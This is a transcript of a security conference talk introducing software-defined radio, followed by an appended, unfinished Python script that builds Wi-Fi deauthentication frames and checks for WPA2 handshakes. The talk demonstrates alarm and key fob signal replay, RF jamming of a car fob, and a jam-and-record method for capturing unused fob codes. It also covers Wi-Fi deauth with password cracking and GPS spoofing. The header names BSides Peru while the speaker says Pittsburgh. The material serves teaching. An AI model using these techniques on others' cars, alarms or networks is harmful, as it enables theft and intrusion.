
Introduction to Software Defined Radio for Offensive and Defensive Operations

BSides Peru · 2024 · 49:06 · Published 2024-08
About this talk
A practical guide to software-defined radio (SDR) fundamentals for security professionals, covering signal detection, analysis, and replay techniques. Drawing from 12 years of field experience in signals intelligence, the talk demonstrates how to identify wireless device frequencies using FCC databases, intercept and decode signals, and perform signal replay attacks on IoT and wireless devices, with live demos on alarm systems and Wi-Fi networks.
Original YouTube description
Introduction to Software Defined Radio for Offensive and Defensive Operations - A brief overview of quick and dirty SDR for beginners and security professionals alike, covering everything from the first 5 minutes of SDR ops, like listening to FM radio, to the first steps in advanced tactics for adversary emulation.
Transcript [en]

All right, everybody, welcome. As you can see, my setup was extremely involved. Start yet? Okay, sorry, denied. Normally at DEF CON they make him do a shot, but this isn't DEF CON, this is BSides Pittsburgh, so instead we make all our speakers wear blinky cat ears. Pull out the little tab and there you go, and then push the button.

Gotcha. All right, yeah. Hey, how do I look? [Applause] All right, so yeah, you guys saw me fumbling with everything in my bag, that feeling you get when your Flipper Zero is on the bottom of the bag under everything else. So I brought a ton of stuff thinking, oh yeah, I could do all these demos, it's going to be wonderful. We are surrounded by steel and concrete, so all my demos are probably not going to work, but that's okay. Some of them I've got videos for, but I'm still going to go through the motions so you can see how this stuff works. So yeah, let's do this. All right, so I am going to introduce you to

software defined radio. This is applied, meaning that I'm not going to go through much of the theory. I'm going to talk about mostly what you would use software defined radio for if you were a beginner, intermediate, maybe some advanced stuff, but I'm giving it a little bit of a flavor, I'm giving it some of that offensive and defensive flavor. This is all material that I've been able to accumulate from maybe 12 years of doing this stuff out in the field. A lot of the equipment that I had was very plug-and-play advanced equipment, and if you tried to dig into it, it would be very complicated. So instead I'm using stuff you can get

on the market. Some of it costs maybe 20 bucks, other things are a lot more expensive than that, but I just want to show you what you're capable of doing with just some basic software defined radio and not a whole lot of skills. So this is not going to be comprehensive by any means. There are some of you in here that probably know a whole lot more than I do when it comes to using this equipment and applying it to certain situations, but that's okay, because there's some people in here that probably have no experience, and that's great. If you take something away from here, that's fantastic; to me, that's comprehensive enough. I'm not going to

get that complicated, for reasons I already explained, because a lot of the stuff may not work, especially when you're looking at aircraft signals, stuff like that, just because the signal is not going to be able to penetrate the structure. It's as simple as that. Radio is very finicky, and it's not going to be exact. When you key a frequency into a radio, depending on the quality of the radio, you may get that frequency or you may get something that's a few hertz or megahertz over that way or over that way. It's not an exact science. Radio is fluid, radio is weird, but it's a whole lot of fun. So who am I? I'm former Air

Force, I just retired. I dealt mostly with signals intelligence. I did a lot of language translation. I did a lot of digital network intelligence stuff, which is fine and good, it's very complicated, but delving into that realm, it kind of got me into, well, this is all great, it's all OSI model layer three, maybe some layer two, layer four. That's great. Everybody was ignoring layer one. It's like as soon as the Cold War ended and we got into the global war on terror, everything was about cyber, cyber this, cyber that. People kind of forgot about what's going on in the airwaves. There's a process we use called electronic preparation of the

battle space. That's where you go in with weird equipment like this, you see what's in the airwaves and you try to decipher what it is. You try to assign it to a particular target. If it's not your target, you ignore it. If it is your target, then you assign it to somebody and they analyze it. Without that kind of preparation, you're just going to be flying blind. You have no idea what's in your environment, you have no idea how the adversary is communicating, you have no idea if the way that you're communicating is going to work, because it might be interfering with something that's already in the environment. So I also did a little bit

of forensics. I do some penetration testing, I'm not going to get into that. I really like radio. I say that I'm obsessed with RF. I like it because a lot of other people don't, so it's a very accessible hobby, but it's also a way that you can try to manipulate your environment just a little bit. Your Wi-Fi is not working great? I know how to survey that to see what's interfering with it so you get the best signal. You get interference on your TV, it's all staticky because you haven't joined the '90s and you have rabbit ear antennas like these for your TV? Fine, I can show you how to orient that to get way better

TV signal. In fact, I will take you to the store and buy you a digital antenna, I will do you that solid. I also like long walks on a sidewalk. I'm not a beach guy, I've never been a beach guy, you can tell from my complexion of a vampire. If we had to do this shirtless, I would blind all of you with how not tan I am. So let's move on. SDR is just what it sounds like, it's software defined radio. Your typical radio is going to have a few circuits, a few crystals, it might have some coils of copper, it's going to have something that moves along those coils of copper, and that's what's going to resonate on

certain frequencies. It's a radio. Who here has not built a radio, or who here has built a radio? It's kind of a dying art. Yeah, a lot of you, that's awesome. Software defined radio is taking all that and turning it into binary. It's radio on a chip, essentially. What you're looking at is something really small, compact, that has a little bit of circuitry in it, and that circuitry has one job: it converts electrical and electronic signals into something that a computer or software application can read. So electrical signal, radio signal into binary, binary back into electrical signal, that's all. What it's missing is what a radio like this has: it's missing a display, it's missing speakers, it's

missing something to modulate or demodulate certain signals, it's missing something that allows a human to understand what these antennas are picking up. So with a software defined radio you have kind of the radio, but then you need the software to define it, and that's where your laptop, your computer, your Raspberry Pi comes in. The antennas are going to do what antennas do. So when you're using a software defined radio, think of it as the computer and the SDR module itself are the radio. The antenna means something, it's just like any other radio: you need the right antenna to do the right job, and we'll get into some of that. It's very versatile, extremely versatile. You

could do everything from talk to satellites to hack Wi-Fi and hack somebody's car with a software defined radio. In the old days you used to have very specific equipment that would have to do this, you have one tool for the job. Anyone here clone cards? You use a Proxmark to clone cards and you can get into hotel rooms. We're not going to get into that either, but it's been done. You need to clone a key fob? Great, you have a sub-gigahertz receiver, you can do that with a software defined radio. With the right stack, with the right equipment built up on it, with the right application, you can make one SDR module

do all of that stuff. It's a lot less crap you've got to carry in your backpack, so that's what that comes down to, and you can see from the pictures there's a lot of applications. This can be for satellites, it could be as big or as small as you want. You can have your cell phone do it, you can have a Raspberry Pi do it, you could have an Arduino do it. Everything that can run signals and run an application can do this. So this is what I'm going to introduce you to today. You have a Flipper Zero, I think anyone knows what these are. You have a HackRF, HackRFs are

fantastic, and then I also have an RTL-SDR. Here are some of the key differences. An RTL-SDR is affordable, it's versatile, it's nice, it runs really hot, so don't touch it after you've been using it for a half hour, but it's receive only. A HackRF can do all the stuff that an RTL-SDR can do, but can also send signals, and that's going to be important for some of the stuff we get into. And then a Flipper Zero can do all that, it can receive, it can send, but it's like a Swiss army knife. Has anyone here ever tried to build a shelter just with a Swiss army knife? It sucks. You're not

using... you're using the right tool for the job, but it's not the right size and configuration of the tool. You can do a lot of stuff with a Swiss army knife, but not all of it is good. You'd rather have a real corkscrew instead of the corkscrew on the Swiss army knife. That's a Flipper Zero: it can do a lot of stuff, but there are better tools out there that can do the same stuff it can do. But if you want something that's just in your pocket, that may or may not get confiscated at the Canadian border, that's a Flipper Zero. All right, some of the software we're going to be using. I have a couple

of favorites. I like SDR#, it's made for Windows but it can run on Linux. I also like SDRangel, it's made for Linux but it can run on Windows, and if it can run on Linux it can run on Mac. So for those Mac users out here, you can more than likely use the same stuff I'm using. If not, a very cursory Google search will give you a whole list of SDR applications that you can use, that you can pair with your hardware, that'll do all the same stuff that I'm going to demo today. Just a couple of definitions here. When I say noise floor, what I mean is you have noise and then you have

nothing. If you're listening down here, you're going to get all the noise, you're going to get static, voice, digital, whatever it is. If you listen above that, you get nothing. That's your noise floor. You can raise it or you can lower it depending on your sensitivity level. A peak: when you key a signal or you try to hone in on a signal, that signal is going to peak up, and you can tell the noise floor is going to raise where that frequency is. That means there's something interesting there. When you start getting good at this stuff, you can tell what kind of signal it is just by what the peak looks like. And then you

have the waterfall. The waterfall is the multicolor thing underneath that histogram. It is going to flow steadily down this way, and it's temporally engaged, meaning that if you find a peak or some other change in the noise floor, it's going to change the color of the waterfall where that peak is, and if that peak goes away, you'll see in the waterfall that color change goes away too. It's kind of cool, it's real time. If you record it and you leave a radio just sitting somewhere for a few hours, you can go back and you can review the waterfall and you can see where there were peaks, where there were changes in color, what frequencies are present in

this area. You are doing your electronic preparation of the battle space, you are seeing the frequencies that are present. All right, the first demo is going to be with just plain FM radio. This is a Baofeng radio. You can get this on Amazon for like a hundred of them for 5 cents, they're really, really cheap. They also break a lot, so if you can get a 10 pack, I recommend that. When the apocalypse comes, you'll be ready. It's either that or you spend 400 bucks on that really, really good Kenwood radio that can do everything, but the problem is that Kenwood is made for amateur radio only, the ham bands. This guy can go

on MURS, FRS, GMRS, maritime, airband, FM radio, it can do all kinds of other stuff. It's not restricted by the FCC. What that also means is if you mess around with this, you're liable to get yourself slapped on the wrist somehow by the government, so be careful with something like this. If you just want to listen to stuff, you're fine; it's transmitting that's going to get the cops called after you. Please ask me how I know. All right, so the first thing I'm going to do here is I'm going to call up SDR#. I am keyed to 462.61, that is the frequency I'm on. I'm going to change this to 462.612. You guys can only see the slides, let

me end the show, we'll start it back up when we need to.

Come on, man, the live demo gods are not being nice to me. All right, there we go, good. So I'm at 462.612 on the radio, 462.612 on SDR#, and this is reading the signal that's coming into these rabbit ears going into my RTL-SDR. If you recall, that's the small gray one that's receive only. Here we go, I'm going to key it, and that's what it looks like. If you had a good, expensive Kenwood radio, you would see one peak and it would look so nice. This is a $30 Baofeng, it is not going to be a clean signal, but it works, it definitely works. Here, I'll even test it out: check one two, check, check one

two. I wonder if you guys were able to hear any of that, probably not, but that's okay. Check, check, check, check. That's all right, it's an imperfect system, but this is what you would set up, and you can set up however many of these with any number of antennas on any number of frequencies to try to get an idea of what's playing in your environment. My local Chick-fil-A uses channel 20 on GMRS to convey all of the orders, so I tune this to what channel 20 is on GMRS, which is 462.612 or something close to that, so I can hear it when they radio my order in. So if they get it wrong, I already know

what's up. You can do this in a more military sense. If you are trying to radio for enemy activity, you can set up an SDR or something similar to this to have a very wide range and a wide band of receive, and you don't have to listen to the communications, you just look at the waterfall while the waterfall is going down. And if you notice, when I keyed there was a waterfall change, you see that? If I recorded that waterfall and I played it back at like 10 times speed, 20 times speed, whatever, and I paused it whenever I saw a change in the waterfall, I can snapshot that, see where the frequencies were, and then if I

was recording everything that this was pulling in, including the audio, then I can go and analyze the signal. Is it data, is it voice, is it visual, is it graphic, is it analog, is it packet radio? After a while you can tell by what the peaks look like what kind of digital data it is, or analog data. Make sense? All right, let's get back to my slideshow, because you guys love slides just like I do. All right, so we demoed that. The next thing that I wanted to demo was ADS-B signal capture. ADS-B breaks out to something nobody cares about, but essentially it's similar to transponder frequencies that come off of aircraft. When you pick up these signals

you will be able to see the aircraft call sign, its altitude, its speed, its direction, and if it has any information about its destination and where it came from, its point of origin, you'll see that too. You can see the make and model of the aircraft, and if you're savvy enough with ADS-B you can actually plot its coordinates on a map so you can see what's going on. This antenna over here is an antenna that is specifically designed for 1090 MHz, or 1.09 GHz. It is specifically designed to pick up ADS-B signals. I tested it out in four different places in this convention center, and the only place where I could get live signals was at track one, so

they put me in track two, so I'm not going to be able to pick up anything live, but I made a recording of some of the stuff that I picked up, so we can possibly watch some of that. Right, so you can see that the aircraft are moving, you can see that I'm selecting some of them to see what kind of aircraft it is. We have one that's southbound that I have selected, we have another one that's going eastbound. This one is East Coast Jets, it's a Learjet, which is nice. This one over here is a Boeing, you can see that it's going to Detroit, Philadelphia to Detroit. This one is out of LaGuardia, and these are live, almost real time. You

can see the altitude, you can see their squawk, you can see what kind of plane it is, the heading. You could zoom in and you could see some more detail if you wanted to. You can see that you have an X on the ground where you'd be able to see it from directly up, and then those vertical lines to the icon of the plane, that's kind of representative of its altitude. You have people that have these things set up all over the world. All you need to do is just look for it online and you'll see these live feeds. This is another way that somebody that didn't have special equipment could set up, via some air tasking order, how we can

detect the air traffic in a particular area if we wanted to do an operation. Is there going to be interference in the air, at what altitude? Is it commercial, is it private, is it mostly helicopter, is it twin engine, is it four engine, what is it? And this is a good way to do that. ADS-B signals are unclassified, you can pick them up wherever. The program I'm using is called dump1090. I'm not a fan of the name, but dump1090 dumps all of the packets I'm capturing at 1090 MHz and it gives you all of this digitally. Having a server give it to you on a map is a nice to have, and

that's something that makes it look pretty, but in reality if you're going low power and you don't have an internet connection to manifest a map like this, just this text over here is good enough to give you all the information that you need. All right, we already did this, I would like to go past this now. All right, if you don't have this equipment, like I said, you use someone else's. Here's a few websites where you can go where you can see some of these live feeds. You can pick the location and you can see whatever aircraft are flying. Some in-laws are coming to visit and you want to track their aircraft, if it took

off in time? Yeah, you can go to Delta's website or whatever, or, and bear with me on this one, you go to one of these sites near their airport, see if anyone is tracking the ADS-B activity, and then you can tell them exactly when their aircraft took off, what path it's taking, and you could even be their tour guide. You could track it for the entire trip. If you have a map behind you, you can tell them, hey guys, just so you know, at this time you were passing by whatever, if you look down to your left you could have seen this lake. It'll amaze them. That's ADS-B. So let's get a little bit deeper

into this now. Those are pretty good beginner projects that'll probably keep you entertained for a month or so, then you want to start getting a little bit malicious. I like messing with sub-gigahertz. Sub-gigahertz is anything that's below, maybe, you know, the 2.4 GHz Wi-Fi range and the ISM band. Now you're looking into things like IoT, car fobs, key fobs, home alarm systems, industrial controls, PLCs, stuff like that. I like to mess with these things because I like to tell people, hey, I messed with it, this is how you can fix it. It's kind of my job, so that's why I like to mess with this stuff. But with software defined radio you can detect all kinds

of signals. The real challenge comes with, well, what signal is it? Because we are immersed in RF these days. There's sub-gigahertz stuff everywhere. You walk around your house with a spectrum analyzer, you'll pick up dozens and dozens of signals and be like, where the hell is this stuff coming from, what is this? You could have a smart device that you don't even know about. It could be the tire pressure monitoring sensors on your car that are keying at 430-whatever MHz, it could be your alarm system, it could be your door alarm, it could be a camera, it could be DECT cordless wireless phones, it could be a baby monitor. There's so many things that it

could be. A lot of the fun is investigating it, but if you dig too deep it'll also frustrate you, but that's neither here nor there. What I'm going to get into is trying to hack some of this stuff. This is my disclaimer: if you want to do any of this stuff, you're going to do it with your own equipment in a home lab, or you're going to do it with somebody's permission. Do not be stupid with this kind of stuff. Homeland Security, the FBI and the FCC, believe it or not, they have enough teeth that if you mess with some electrical grid or some other IoT or commercial alarms, they will come after you. So what I'm going to demo is going

to be that kind of stuff, but it's going to be low power and it's not going to mess with anything. If anyone here suddenly has lapses in some device or some service or whatever, I'm sorry, I'm sorry, but you chose to sit here. So let's move on. All right, your typical order of operations for signal analysis is: you pick up the device. If it is made in the US particularly, you look for the FCC ID. The FCC ID is something that you could find online. You go to fcc.gov, something like that, you can do a cursory Google search, it'll take you right there. You punch in that alphanumeric FCC ID, it'll take you to a spec sheet. That spec sheet will

say what frequency it operates on, and then bam, you have a starting point. And this is if you want to analyze some device like your car key fob or something else that you happen to buy in the US. If you want to go even deeper, you can demodulate the signal to see exactly what the binary says, because sometimes it's not just an on/off signal, sometimes it carries some data, you know, maybe like a sequence counter or some other random number generator, like for a car key fob. Sometimes it is that simple, other times it really isn't that simple at all, and it takes a lot of work to figure out exactly what you're

looking at. I wanted to test this device. This is an alarm, it's something you could put on a door, a cabinet, a garage door, anything. The way that it works is that you have the alarm unit and then you have this mag strip over here. When they are matched up, the alarm is inactive. I don't think I have this active, but just in case I do, get ready for a loud noise when you separate them. All right, good, the alarm goes off. I'm going to put these together and I am going to arm this. I'm going to take it away. If anyone is not down with loud noises, cover your ears, in three, two, one. And I just unlocked it. That's the

alarm. Here's the kind of fun that we can have with this alarm. This is the fob controller that activates and deactivates the alarm, it arms and disarms. It is a lot of fun working with this stuff. So I'm going to stop this, I'm going to go back to the RTL-SDR. Now if I key this, it wasn't supposed to do that, sorry, it should give you some kind of a signal. This is the disarm. Now just by virtue of doing some searching I figured out where this signal was, and if I could remember, then this would be fantastic, but don't worry, if I can't remember, I've got a video of it because I'm awesome like

that. Well, if that fails, the other standard is about 315

MHz. Strange, weird, can't find it. Remember when I said this is not an exact science? Sometimes stuff like this will happen, something might be interfering where I can't pick it up. Oh, there it is, there we go, we got it. All right, crisis averted, way to go Gray Fox. So there's my signal, it's at [Music]

what was going on with this alarm. The problem is that when I opened it up I found nothing, no FCC ID, nothing like that, so this I had to do by hand, exactly what you just saw. That's probably 20 hours of my days, is doing stuff like that, just doing some general research, finding where stuff like this would operate in a general sense, and then going and troubleshooting, and that's basically what you do. When I cracked this open I found nothing that told me any frequency, so I had to go and I had to do it manually. So that's what you have to work with sometimes, and that's why this was so much fun. So we're going

to signal replay it. A signal replay is essentially where you take the signal, you copy it, you replay it. I'm going to use a Flipper Zero to do this. Here is my Flipper Zero, so you go to start, and the cool thing about this, it's a jack of all trades. You go to Sub-GHz and you can read essentially anything that you want to. So I'm going to go here and now I can read, I can read raw, I could do save stuff. If I read raw, it just gives me one of these. Now I'm going to hit record, let's do the unlock signal, there it is. Now I'm going to stop this, bam, and now I can save it or I can send

it. I am not pushing any single button here.

Come on, man, you can do

this. Let me save it and see if that makes a difference. Save. That's fine. All right, go back, go to saved, let's play this.

Hm, I'm going to try it one more time. I don't know, this never happens. All right, let's redo, going to record this: unlock, stop, send.

Interesting. All right, well, that's demo failure number one, but I think you guys all get the idea. You saw that I recorded a signal, this repeats, and then it should give you the same kind of signal back. The reason why it's not playing, I'm not sure. It might be the proximity of some other signal, it could also be that I had the fob right there, but yeah, weird. Anyway, that's failure number one and I apologize for that, but that's okay, we're going to press on. But you saw how that works, you saw how I did that. The principle is the same, and you can do a DoS attack using the same principles. Now you saw how I did a

copy and how I did like a repeat. It didn't work on this one, but it could work on other ones. Another way to do this is not copying a signal but just trying to deny the signal. Now the way you do that is you have a signal, something like this remote, that's putting out that alarm signal. If I can't copy it and replay it, then I can make sure that nobody can play it ever again. I know the frequency this operates on, so I can generate that signal and I can drown it out. The way to explain a DoS attack with radio is the same thing as, like, someone is having a conversation and you walk right up to them, you

go... nobody can hear what they're saying, you just DoS them. That's how that works. Now I'm kind of hoping this demo also works, we'll see what happens, but here we go. Now I have SDR# and I have SDRangel up. SDRangel is connected to my HackRF. This can generate a signal, whereas the RTL-SDR only receives a signal. I know what the frequency is here. I'm going to key this again and you see that signal went up. So if I start my HackRF and I start generating a signal, I can take this signal down right where I need it, and you can see the peak is there, and I moved it just about where I need

it. Let's zoom in a little bit. All right, so you can see over here, that's the signal I'm generating right there, that big peak. Now do this unlock again. All right, now let me move the signal closer in, where it's just above this signal. All right, now let's amplify it, give it some more oomph, give us some more juice, and now widen it a little bit. You can see the signal is still going, but this is not reading it, it's being drowned out by the HackRF. This demo worked, nailed

it. You can do the same thing with all kinds of other RF, and this is why I had that disclaimer. That disclaimer definitely means something. You want to make sure you're not doing something illegal, because if you DoS, denial of service, something that people depend on, like the electrical grid or water or a vehicle, it can be hairy for you. This video is me demoing the same thing with a car fob. Unfortunately I don't have any sound. If you did have sound, then you would hear that the car is actually going beep when I do this. Now I start the signal with the HackRF and I'm going to amplify it, and I'm

going to widen it a little bit so I can try to drown out that signal. Now I've got a big signal, and now you see lights aren't going on, nothing is happening. I drowned out that signal. It'd be cooler if you had the audio so you could hear the beeps, but just seeing the lights not activate, that's enough to demonstrate that this DoS attack worked on that particular vehicle. So let's go to the next slide, because we already saw this. Okay, now that we went over that, here's some more ideas, things I'm not able to demo simply because there's not enough time or I just don't want to get arrested. You can get a tinySA Ultra

spectrum analyzer, which is a really cool little handheld thing that can analyze the spectrum in a really wide view, and it'll give you that waterfall that I'm talking about. So with just one antenna that can cover a whole bunch of RF, you could see exactly what's going on in your environment in something like 100 MHz worth of bandwidth, or maybe a gigahertz of bandwidth. Obviously the wider you get, the less accurate you are, but it gives you something to start. Next thing you can do is radio direction finding. There's an SDR called KrakenSDR. It's called KrakenSDR because it has six, I think it's six, it could be eight, different antenna outputs that you can

attach. Each antenna gives you a little bit of an offset of how you're going to detect your RF. That offset will allow you to triangulate signals. So if I have an antenna here, an antenna there, and somebody keys over there, this will get a stronger signal, this will get a weaker signal. Let me reorient this way: somebody keys over there, same signal, same signal. Great, now we can triangulate, and we can at least get somewhat of a defined area of where that signal is, and that's how you direction find. You can use a bladeRF and you can start your own cellular phone service thing. Stingrays do that already, but they only do it on 2G. I hate

to tell you guys, there's new technology that allows those who can afford it, whether it's government or not, to be able to simulate cell towers that are also 3G, sometimes LTE, but I have no documentation on that, probably because it's super classified. But if you use a bladeRF and you happen to work in the 5G, LTE or even the 3G UMTS space, you can simulate a cell tower and you can start doing experiments and pen testing. It's about the same price point as a HackRF. And then you can do GPS signal spoofing, and you can use a lot of things for this, but I've only ever done it with a HackRF or a LimeSDR. You can get on

GitHub and you can get a GPS simulator, you can spoof GPS signals from a HackRF. I can do this on the side of a highway. Your in-laws are coming to visit, you don't want them to find you, they have their GPS on, they know they're heading to Pittsburgh, but as soon as they reach 376, suddenly their GPS says they're in Thailand. You might buy yourself some time. I'm not advocating for this, I'm just saying it's applied preparation of the battle space, remember. Let's see how much time we have left. Not a lot, but I can't demo Wi-Fi, but Wi-Fi is everywhere, and you can use a Flipper Zero and probably some of this other equipment to do a Wi-Fi deauth attack,

and the way that you would do that would be using this guy. So if you have a Wi-Fi dev board on your GPIO, which is the top of your Flipper Zero, you could put different boards in these chips and it'll give you some expanded capabilities. I was using a Wi-Fi dev board. This can do natively RFID, infrared, sub-gigahertz stuff; it can't do Wi-Fi natively, so you've got to put in your own board. Using that, I detected all the beacon packets of SSIDs that were around me, I listed them, I found my target, and then after I found my target I went and I started putting out deauth packets. For those of you not

familiar with how to hack Wi-Fi: the way Wi-Fi devices talk to each other is you're authenticated to a network and it goes by packets in the air. If you inject packets that say "deauthenticate that user," it'll deauthenticate, and if that user auto-connects back, then you can collect those new authentication packets, which have the password in them, and that's how you would crack a Wi-Fi password. And that's what I did here. My attack is going to be deauth; now I'm running it, and then I'm going to go down here and I'm going to sniff all the raw packets. Now that I'm sending deauth, I am now sniffing those packets, and then if all goes correctly,

after you're finished collecting stuff, you stop it and then you save that file. This is me collecting all those packets, including the deauthentication and reauthentication packets. If I'm lucky, I'm going to get packets that are going to be EAPOL packets, otherwise known as reauthentication packets. It's going to be your Wi-Fi four-way handshake; it's going to have passwords in it, probably encrypted, but that's why we do password cracking. And so now I saved it. Having saved it, I can open it up with some kind of packet analyzer, which for me is going to be Wireshark, and then there you go. I went and I did a search for EAPOL

packets and I was able to find them. Did I do that search? I don't know, I don't think I recorded that part. But if you filter for EAP, which is Extensible Authentication something (you smart people probably know what it is; I work in layer one, man), those are packets that are going to have the passwords, and then from there you would crack it. But that's beyond our scope, unfortunately. So let's do it anyway. Here we are, this is me in Kali Linux, and I'm doing run-of-the-mill aircrack-ng stuff just like anyone else does. I'm selecting my packets, then I'm going to go through and I'm going to brute-force it

and I'm going to get what I need to get. This video is going to play out and then the next slide is just going to be questions, so while this is playing out, any questions? Yes. I'm sorry, but the war has taken my hearing. All right, here we go.

From what you showed me, would it be possible to identify and recognize air-gapped computers and servers and disrupt them from these signals?

That's complicated. You could do that. So the question basically is: you have an air-gapped computer that has no network connectivity; can you use software-defined radio to detect it? The answer is yes, but it's not going to give you what you think it's going to give you, so

air-gapped computers need to run, so they're going to have power cords, power cables; you're going to have resonant frequencies from the power cables. If you get really deep into things like Van Eck phreaking, where you pick up signals from an LED monitor and you reproduce a picture from the pixelation sequence, you can do that, but unfortunately none of that really has the intelligence value that you might need. So if you're looking for content, stuff like that, SDR is not going to get you what you need. You're going to need to have physical access to that air-gapped computer in order to either put a

transmitter on it or to have something so close to it that you can maybe pick up data that's going through unshielded twisted pair Ethernet, something like that. Does that answer your question? All right, anyone else?

Hey, thank you. So there's some dude who tracks people's airplanes on Twitter, like Taylor Swift and Elon Musk, and then he puts out where their aircraft is. Do you know if he's doing that using some of these public repositories of ADS-B channels, or is he using his own, or is there some other way?

Yeah, that's probably part of it. The thing is, there are many ways that you can detect trajectories

and locations of aircraft. ADS-B is one of them, but it's not the end-all be-all, it's just one component. You can also have more sophisticated equipment that can actually get the official transponders of these aircraft. You might also have other means that are not software-defined radio but are actually network taps, that maybe have access to servers that have this data, and then from there you can enrich whatever program you want. But if you're doing it specifically just with software-defined radio, commercial off-the-shelf stuff, ADS-B is more than likely 75% of what they're getting, and then the other 25% is going to be actual

transponders, like real FAA transponder frequencies, which are typically not advertised because they're meant to be sensitive government communications. I may be wrong on that one, but it's not something that's well advertised, whereas ADS-B is just out there in the open. The problem is you're not required to transmit ADS-B signals; you are required to transmit transponder frequencies. So you may get what you want, you may not get what you want, but for the most part a lot of that is going to come from something like ADS-B. Answer your question? All right, cool. What else? Yes.

I got a question about the car fob. Right, say you did a

basically a masking of the car fob unlocking a car, by a larger band. Now does that mean, let's say I'm that driver and I press it three, four times, I'm like, God, the battery's dead or something, I stop; can you now replay that first capture?

Yeah, because he blocked it. I'm really glad you asked that. That was going to be something I wanted to demo, but it probably would have taken up a lot of time. You can jam that kind of a signal so that the user of the key fob cannot activate or deactivate the car or interact with it one way or another, but

you saw that the signal was still being played even though I was jamming it. You could record that and then you can get a band filter or some other kind of digital filter where you take out the raw signal that I was playing, and now you have that original signal. Another way to do it, and I was too low on power to do this, is you offset the jam signal by a few hertz so that you have the concurrent signals next to each other; they're not interfering with each other, but this one is still so loud that it's still within the band-pass of the original signal, so it'll still block it, but now I have an unfettered recording

of that. And that's actually the way that works: you jam it so someone's not able to get into the car, and then they walk away to try to call somebody or whatever. Now that I recorded these, but they are not recorded in the vehicle security system, I can successfully replay them. Remember that disclaimer. All right, anyone else?

Yeah, I have a question. Appreciate the warning on, you know, do this to your own equipment. Is there anything that is cloud-connected or anything like that that you have to be careful of, like even though you're doing the local signal, that might get detected and picked up by those service providers?

The VA loves me

because my hearing is crap, so I'm going to come over to you. Can you please repeat that? So you're hacking... that was another free demo of a DoS. Go ahead.

All right, let's try this one more time. So when you're going after your own equipment, is there anything that you need to be careful of when the equipment is cloud-connected, that they can tell, even though it's a local signal that you're interfering with, but they get some sort of feedback?

No. If I'm understanding you right, you have equipment that's connected but it is also being cloud backed up or it has another connection. Everything we're doing is layer one. It's all going to be

in the immediate RF environment. So if it's connected over the internet to something, then there should be zero interference, unless your cloud server or wherever was on-prem next door; then you might have somebody knocking down your door. But yeah, you should be fine. Got a radius with this guy. All right, anybody else?

What was the most interesting thing that you've seen that gave off a frequency that surprised you?

Most interesting thing, okay. Well, there's a lot. I'll give you the most recent interesting thing. When I was designing this presentation in my home lab, I had this very cable that's connecting my laptop to the audio-visual; it's a DisplayPort to HDMI

converting cable. At particular frequencies with that same Baofeng radio, specifically at about 146 and 147 MHz, if I was within 3 feet of it, I would key it and it would kill it. It would kill the cord; my monitor would just go blank and it would reset. I'd back up a foot, do it again, nothing. Go forward a foot, do it again, kill the monitor. Go forward another foot, do it again, kill the monitor. I went up a few megahertz, same thing; went up a few more megahertz, nothing. So that to me means that this cable is resonant at some frequency that can gain interference from a strong radio signal, and that to me is really,

really interesting, because, once again, that disclaimer: if you get something that's strong enough, you may be able to disrupt an entire organization's wires everywhere. You could black monitors out, you can black electrical cables out, IoT, anything that happens to have either a really crappily designed cable or a crappily designed monitor; you can DoS all that stuff. I think that's super, super interesting because it happens instantaneously, and if you try to analyze it, it's already too late; you have no monitor, so how are you going to analyze it anyway? All right, I'm pretty sure that I'm out of time by now, but if anyone wants to catch me offline, you can, I'll be around. Anyone else? Okay, one more.

Whenever you were preparing your battle space, how often was it that you encountered signals you couldn't identify, and how did you deal with those?

The middle of the question, can you repeat that?

How often did you encounter signals that you couldn't identify, and how did you deal with those?

All the time, every time. Most typically we would have documentation from some precedent source, like other surveys that people may have done, or things that we get from open source or even classified material, that would tell us what signals were being put out by what. We know that there are cell towers in the area, we know that there are radio

towers, there's VHF/UHF repeaters, DMR radio repeaters, the APCs and tanks that these units are using communicate over this frequency for their command and control. We would know a lot of that, and the majority of our job was listening to make sure that that was right, and if we didn't hear any of that, then we would go searching around it to see if we could find it, if they changed it. If we're going into an area that just has raw signals everywhere and we have no prior intelligence from any documentation or any other intelligence source on the ground, then it could take two weeks, three weeks, maybe a month, even a year, depending on where we are, to

get a real good idea of what the baseline noise floor is and what those frequencies are, what they go to, how to attribute them. It also depends on the kind of target. If we got a call that somebody somewhere is going to do something bad, it's going to be kinetic and people are going to get hurt, sometimes we don't care about the RF; we'll go to human intelligence or some other intelligence and we just won't listen on signals, because we just don't have the time. But if it's something where we can take our time, we can survey an area, and we need to go in here and we can't put people in there because it's a

non-permissive area, then we'll sit there and we'll analyze those signals as much as we can. And I would probably say 50% of the time we can't attribute a signal, and if we can't attribute it, there's nothing we can do about that. Sometimes you've got to stop admiring the problem and you've got to move on. Other times you can make definitely sure what you're seeing is what you're seeing: if you have a UAV flying over a particular truck and you keep getting CB radio coming off of it and it co-locates with that truck, it's probably that truck. All right, I'm not going to spend any more time on that. Let's move on. You know, don't

let perfect be the enemy of good when it comes to RF, because you're just going to tear your hair out. Does that make sense? All right.

All right, the legendary Gray Fox, everyone. All right, we're going to start our next talk in about 10 minutes. We're going to take a break; come on back. I hear the cookie table's out.
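The Wi-Fi portion of the talk (deauth the client, sniff for EAPOL, hand the capture to aircrack-ng) is the one step that can be checked offline before anyone starts cracking. The following is an editor-added example, not code from the talk or the speaker: a stdlib-only Python script that builds a deauthentication frame the way an injection tool would, walks an 802.11 capture for EAPOL-Key frames, classifies each as message 1 to 4 of the WPA2 four-way handshake from its Key Information bits, and reports whether a (BSSID, client) pair has a handshake a cracker can use. One caveat the talk glosses over: the handshake never carries the password, only the two nonces and a MIC keyed from the PMK; cracking recomputes that MIC for each candidate passphrase, which is why an M2 paired with the matching M1 (or M3) is required and a lone M1 or a pile of deauths is useless. The MAC addresses, nonces, frames and pcap bytes below are constructed sample data; the pcap reader handles classic pcap with link type 105 or 127 (radiotap), not pcapng.

```python
# Editor-added example: deauth frames and crackable WPA2 handshakes in an 802.11 capture.
import struct

# EAPOL-Key "Key Information" bits (IEEE 802.11, clause 12.7.2)
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x08, 0x40, 0x80, 0x100, 0x200
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header + EtherType 0x888E

def mac(s):
    return bytes.fromhex(s.replace(":", ""))

def fmt(b):
    return ":".join(f"{x:02x}" for x in b)

def build_deauth(dst, src, bssid, reason=7, seq=0):
    """Management frame, subtype 12: the whole payload an injection tool sends to kick a client."""
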